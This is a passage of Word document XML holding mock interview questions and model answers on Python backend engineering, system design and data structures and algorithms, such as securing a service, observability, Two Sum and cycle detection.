    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set explicit connect and read timeouts for every outbound call, retry only transient failures with exponential backoff and jitter, and use idempotency keys for operations that may create or mutate state. Add circuit breakers or bulkheads when a dependency is failing so callers fail fast instead of piling up. Log dependency latency, status codes, retry counts, and fallback behavior, and expose these as metrics for alerting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you secure a Python backend service, including authentication, authorization, secrets, input validation, and dependency security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Validate identity with JWT/OAuth2/IAP or a trusted gateway, enforce authorization with roles/scopes or policy checks per endpoint, and never trust client-supplied tenant or role data. Store secrets in Secret Manager or Vault, validate inputs with schemas, use parameterized queries, sanitize file uploads, and apply least privilege to service accounts. Pin dependencies, scan for CVEs, keep base images patched, and avoid logging tokens, PII, or secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What logs, metrics, traces, health checks, and dashboards would you add to a production Python service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add structured JSON logs with request ID, trace ID, user or tenant context where safe, endpoint, status, latency, and error details. Emit RED metrics: request rate, errors, duration, plus saturation metrics like CPU, memory, worker queue depth, DB pool usage, and dependency latency. Add OpenTelemetry traces across database and external calls, /healthz and /readyz endpoints, and dashboards for golden signals, deployments, incidents, and SLO burn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you test a Python backend system across unit tests, integration tests, contract tests, load tests, and end-to-end tests?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use unit tests for pure business logic, integration tests with a real or containerized database/cache, API tests with TestClient or httpx, and contract tests for external consumers or providers. Add migration tests, auth/security tests, failure-path tests, and load tests for critical endpoints. In CI, run fast tests on every PR and heavier integration/load suites on merge or release candidates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you containerize and deploy a Python web service on Kubernetes or Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a small image with pinned dependencies, a non-root user, health endpoints, and a production server such as Gunicorn with Uvicorn workers for ASGI apps. Configure environment variables, secrets, readiness/liveness probes, resource requests/limits, autoscaling, graceful shutdown, and structured logging. On Kubernetes, use Deployments, Services, HPA, ingress, and rollout strategy; on Cloud Run, tune concurrency, min instances, CPU allocation, and revision traffic splitting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. A Python API has high latency and high CPU usage in production. How would you debug and optimize it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with dashboards and traces to find which endpoint, version, dependency, or code path changed. Check CPU profiles, slow database queries, N+1 ORM calls, serialization overhead, blocking calls inside async handlers, worker saturation, GC pressure, and container CPU throttling. Optimize the real bottleneck: add indexes, reduce payloads, cache hot reads, batch calls, move CPU-heavy work to workers, tune worker counts, or scale horizontally while fixing the root cause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Design a URL shortener using Python. What components, data model, caching, scaling, and failure handling would you include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python API service with endpoints to create and resolve short URLs, a database table mapping short_code to long_url plus owner, expiry, status, and created_at, and Redis/CDN caching for hot redirects. Generate collision-resistant codes with base62 IDs or random tokens with uniqueness checks. Redirect reads must be very fast, writes can be lower volume, analytics should go through an async event pipeline, and abuse controls should include rate limits, safe-browsing checks, and admin disablement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Design a notification system in Python that supports email, SMS, retries, templates, rate limits, and audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use an API to accept notification requests, validate templates and recipients, persist an audit record, and enqueue delivery jobs. Worker services process jobs by channel, render templates, call providers, retry transient failures with backoff, and move poison messages to a dead-letter queue. Add per-tenant and per-provider rate limits, idempotency keys, delivery status tracking, provider failover where needed, and dashboards for success rate, latency, backlog, and provider errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Design a file upload and processing service in Python for large files, asynchronous processing, status tracking, and secure storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use pre-signed upload URLs so clients upload large files directly to object storage instead of streaming through the Python API. Store file metadata and status in a database, trigger processing through a queue or storage event, and run workers for validation, virus scanning, parsing, thumbnails, or transformations. Track states such as uploaded, processing, failed, and completed, enforce size/type limits, encrypt storage, scan content, and expose a status endpoint with retry-safe processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Design a real-time chat or WebSocket service in Python. How would you handle scaling, message delivery, presence, and persistence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python ASGI service with WebSockets for live connections, backed by Redis Pub/Sub, Kafka, or another broker so messages can reach users connected to different replicas. Persist messages in a database, track presence with short-lived Redis keys or heartbeats, and use delivery acknowledgements for important messages. Plan for horizontal scaling, load balancer timeouts, reconnects, backpressure, rate limits, authentication on connection, and fallback APIs for history retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 54 - DSA for Python Developers Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you analyze time and space complexity for a Python solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Complexity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count how the number of operations grows as input size n grows, ignoring constants and small lower-order terms. A single loop is often O(n), nested loops are often O(n^2), binary search is O(log n), and sorting is usually O(n log n). Space complexity counts extra memory such as hash maps, recursion stack, queues, or copied lists. In Python, also remember that slicing, list membership, and string concatenation may hide extra time or memory costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you solve Two Sum in Python, and what is the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Arrays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dictionary from number to index. Iterate through nums, compute complement = target - nums[i], and check whether the complement is already in the dictionary. If yes, return the stored index and current index; otherwise store nums[i]. This is O(n) time and O(n) extra space, much better than the O(n^2) brute-force pair check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you check whether two strings are anagrams in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: If the lengths differ, return false. Then either compare Counter(s1) == Counter(s2), which is clear and O(n), or count characters manually in a dictionary. Sorting both strings also works but costs O(n log n). In interviews, mention case sensitivity, spaces, punctuation, and Unicode assumptions before choosing the implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you find the longest substring without repeating characters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a sliding window with a left pointer and a dictionary mapping each character to its latest index. Move the right pointer through the string; when a repeated character appears inside the current window, move left to one position after the previous occurrence. Track the maximum window length. This is O(n) time and O(min(n, alphabet size)) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use the two-pointer technique, and how would you apply it to a sorted array?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Two Pointers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use two pointers when the input is sorted or when you need to compare/move from both ends, compact in place, merge, or maintain a window. For a sorted two-sum style problem, place left at the start and right at the end. If nums[left] + nums[right] is too small, move left forward; if too large, move right backward; if equal, you found the answer. This is O(n).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Why are hash maps useful in coding interviews, and what are common pitfalls in Python dictionaries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Hashing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hash maps give average O(1) lookup, insert, and update, which often turns nested-loop searches into linear-time solutions. They are useful for frequency counts, seen sets, index lookup, grouping, and memoization. Pitfalls include assuming order in older Python versions, using mutable objects as keys, forgetting that worst-case hashing can degrade, and accidentally overwriting values when duplicates matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you validate balanced parentheses using a stack?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Push opening brackets onto a stack. For each closing bracket, check that the stack is not empty and that the top opening bracket matches the closing bracket. Pop on a match; otherwise return false. At the end, the stack must be empty. This is O(n) time and O(n) space in the worst case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. When would you use a queue or deque in Python, and why is list.pop(0) usually avoided?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Queue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a queue for FIFO processing such as BFS, task scheduling, or level-order traversal. In Python, collections.deque is preferred because append and popleft are O(1). list.pop(0) is usually avoided because removing from the front shifts all remaining elements left, making it O(n) per operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you detect a cycle in a linked list?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Linked List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Floyd's tortoise and hare algorithm. Move slow one step and fast two steps. If there is a cycle, fast will eventually meet slow; if fast reaches None, there is no cycle. This uses O(n) time and O(1) space. An alternative is a visited set, but that uses O(n) extra memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you perform BFS and DFS traversal of a binary tree?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Trees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For BFS, use a queue/deque starting with the root, pop nodes from the left, visit them, and push children. For DFS, use recursion or an explicit stack for preorder, inorder, or postorder traversal. BFS is useful for level-order and shortest path in unweighted graphs; DFS is useful for exploring structure, recursion problems, and tree properties. Both are O(n) time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you use binary search to find the first occurrence of a target in a sorted array?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Binary Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Maintain left and right bounds and an answer initialized to -1. When mid equals target, store mid as a candidate answer and move right to mid - 1 to search for an earlier occurrence. If nums[mid] is less than target, move left to mid + 1; otherwise move right to mid - 1. This is O(log n) time and O(1) space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you find the top K frequent elements using a heap or Counter in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Count frequencies with collections.Counter. For clarity, Counter(nums).most_common(k) returns the top k by frequency. For a heap approach, maintain a min-heap of size k containing (frequency, value); push each item and pop when heap size exceeds k. Counting is O(n), and the heap method is O(m log k), where m is the number of unique elements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you detect whether an undirected graph has a cycle?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Graphs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use DFS with a visited set and parent tracking. For each unvisited node, DFS through its neighbors; if you see a visited neighbor that is not the parent, a cycle exists. This is O(V + E). Another good approach is Union-Find: for each edge, if both vertices already have the same root, adding that edge creates a cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do recursion and backtracking work, and what should you watch out for in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Recursion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Recursion solves a problem by calling the same function on smaller subproblems with a clear base case. Backtracking explores choices, recurses, then undoes the choice to explore alternatives, often used for permutations, subsets, combinations, and constraint problems. In Python, watch recursion depth, mutable shared state, missing base cases, and exponential branching; use iterative solutions or memoization when appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you explain dynamic programming using the climbing stairs problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Dynamic Programming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dynamic programming applies when a problem has overlapping subproblems and optimal substructure. In climbing stairs, ways(n) = ways(n - 1) + ways(n - 2), because the last step came from one step below or two steps below. A naive recursive solution repeats work; memoization or bottom-up iteration makes it O(n) time. Since only the last two values are needed, space can be optimized to O(1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How do you approach a new DSA problem in an interview from clarification to optimized solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DSA/Interview Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify inputs, outputs, constraints, edge cases, and whether duplicates/order matter. Start with a simple brute-force solution and explain its complexity. Look for patterns such as hashing, two pointers, sliding window, binary search, stack, heap, graph traversal, or DP. Then propose the optimized approach, walk through an example, code cleanly, test edge cases, and discuss time/space complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 55 - Full Stack Python Engineer with DSA, DevOps, and GenAI Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design and build a full-stack application using Python for the backend and a modern JavaScript frontend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Full Stack/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a Python backend such as FastAPI or Django for APIs, business logic, auth, database access, background jobs, and integrations. Use React, Next.js, or another frontend framework for UI, routing, state, forms, and API calls. Define API contracts with OpenAPI, use PostgreSQL for transactional data, Redis for caching or sessions, object storage for files, and a queue for slow work. Deploy frontend and backend separately, add CI/CD, tests, observability, and environment-specific configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
